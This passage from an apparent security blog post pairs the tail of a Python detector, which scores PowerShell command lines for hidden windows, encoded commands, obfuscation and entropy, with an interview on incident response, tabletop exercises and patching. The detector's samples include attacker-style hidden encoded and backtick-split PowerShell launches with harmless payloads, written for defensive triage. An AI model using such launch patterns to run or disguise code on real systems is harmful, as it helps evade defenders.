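ENCODED_SAMPLE = base64.b64encode(
    "Write-Host 'constructed sample'".encode("utf-16le")).decode("ascii")

SAMPLE_COMMAND_LINES = {
    "scheduled_backup": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1",
    "encoded_hidden": f"powershell.exe -nop -w hidden -enc {ENCODED_SAMPLE}",
    "token_splitting": 'powershell.exe -w hidden -c "W`r`i`t`e-H`o`s`t 1"',
}


def shannon_entropy(text):
    """Bits per character; base64 blobs score high, English-like text lower."""
    if not text:
        return 0.0
    counts, n = Counter(text), len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE) or None."""
    match = ENCODED_ARG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def score_command_line(cmdline):
    """Apply every rule and return (score, list of rule names that fired)."""
    score, reasons = 0, []
    for name, pattern, weight in RULES:
        if pattern.search(cmdline):
            score += weight
            reasons.append(name)
    if cmdline.count("`") + cmdline.count("^") > OBFUSCATION_CHARS:
        score += 2
        reasons.append("token_splitting")
    if shannon_entropy(cmdline) > ENTROPY_THRESHOLD:
        score += 2
        reasons.append("high_entropy")
    return score, reasons


def triage(cmdline):
    """Map the score to an assumed three-tier decision and attach the decoded payload."""
    score, reasons = score_command_line(cmdline)
    decision = "escalate" if score >= 5 else "review" if score >= 2 else "close"
    return {"decision": decision, "score": score, "reasons": reasons,
            "decoded": decode_encoded_command(cmdline)}


if __name__ == "__main__":
    for label, cmdline in SAMPLE_COMMAND_LINES.items():
        print(label, triage(cmdline))
```

The scheduled backup closes on a single low-weight flag, the hidden encoded launch escalates before the analyst has to read any base64, and the backtick-split command lands in the review tier on the strength of its hidden window plus obfuscation characters. The decoded payload is what separates a four-minute decision from a dead end; in a real queue the weights would be tuned against the false-positive rate Dave describes.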

Natalia: What does an incident responder need to succeed?

Dave: I’d strongly recommend doing an incident response readiness assessment for your organization. I also recommend centralized logging—whether that’s a security information and event management (SIEM) or a data analytics tool or a data lake—that you can comb through. I’m a huge advocate of Sysmon. You can do power execution, command line auditing, DNS traffic, process injection, and parent-child process relationships. I’d also suggest network logs. If you can do full packet captures, which not a lot of organizations can do, that’s also great. If you can pull data packets coming from a secure sockets layer (SSL) or transport layer security (TLS) and do remote memory acquisition, that’s also really important. Can we retrieve artifacts from systems in a very consistent way?

Tabletop exercises can also get executives and IT on the same page about how to handle incidents and work together. Running through very specific types of scenarios can help you figure out where you have gaps or weaknesses. When I was the Chief Security Officer at Diebold, we would run through three to four tabletop exercises a year and include our senior leadership, like our CEO and CFO, twice a year. It was eye-opening for them because they never really understood what goes into incident response and what can happen from a cyber perspective. We’d run through actual simulations and scenarios of very specific attacks and see how they would respond. Those types of scenarios really help build your team’s understanding and determine where you may need better communication, better tooling, or better ways to respond.

Natalia: What other strategies can security operators implement to try to avoid attacks?

Dave: When you look at layered defense, always improving protection is key. You don’t want to just focus on detection because you’re going to be in firefighting mode all the time. The basics really are a big deal: things like multifactor authentication, patch management, and security architecture.

Reducing the attack surface is important, such as with application control and allowed application lists. Application control is probably one of the most effective ways of shutting down most attacks out there today because you have a good baseline of your organization. That applies very consistently to things like the Zero Trust model. Become more of a service provider for your organization versus providing everything for your organization. Reducing your attack surface will eliminate the noise that incident responders or SOC analysts must deal with and allow them to focus on a lot of the high-fidelity type things that we want to see.

One of the things that I see continuously going into a lot of organizations is that they’re just always in firefighting mode, 90 percent of their alarms are false positives, and they’re in alarm fatigue. Their security operations center isn’t improving on detections. You really need somebody on the strategy side to come in and say: Can we lock our users down in a way that doesn’t hinder the business, but also lowers the attack surface?

Natalia: How does vulnerability assessment strategy fit into a SOC strategy?

Dave: Program vulnerabilities and exposures are key opportunities that attackers will use. When we look at historic data breaches, those that use direct exploitation and not phishing were using common vulnerabilities and exposures (CVE) typically of six months or older that allowed them access to a specific system. That makes it really important to reduce attack surfaces and understand where vulnerabilities are so we can make it a lot more difficult for attackers to get in.

It’s not a zero-day attack that’s hitting companies today. It’s out-of-date systems. It’s not patching appropriately. A lot of companies will do well on the operating system side. They’ll patch their Windows machines, their Linux machines, and Apple. But they fail really hard with the third-party applications and especially the web application tier of the house—middleware, microservices. In almost every case, it comes down to ownership of the application. A lot of times, IT will own the operating system platforms and the infrastructure that it’s on, but business owners typically sponsor those applications and so ownership becomes a very murky area. Is it the business owners that own the updates of the applications or does IT? Make sure you have clear owners in charge of making sure patches go out regularly.

If you’re not going through regular vulnerability assessments and looking for the vulnerabilities in your environment, you’re very predisposed to a data breach that attackers would leverage based on missing patches or missing specific security fixes. The first few stages of an attack are the most critical because that’s where most organizations have built their defenses. In the latter phases of post-exploitation, especially as you get to the exfiltration components, most organizations don’t have good detection capabilities. It’s really important to have those detection mechanisms in place ahead of time and ensure those systems are patched.

Natalia: We often discuss the challenges facing security today. Let’s take a different approach. What gives you hope?

Dave: What gives me hope is the shift in security. Ten years ago, we would go into organizations from a penetration testing perspective and just destroy these companies. And then the next year, we’d go in and we’d destroy these companies again. Their focus was always on the technical vulnerabilities and not on what happens after attackers are in your castle. The industry has really shifted toward the mindset of we have to get better at looking for deviations of patterns of behavior to be able to respond much more effectively. The industry is definitely tracking in the right direction, and that really gives me hope.

Learn how Microsoft Security solutions can help modernize Security Operations.

To learn more about Microsoft Security solutions visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post A playbook for modernizing security operations appeared first on Microsoft Security.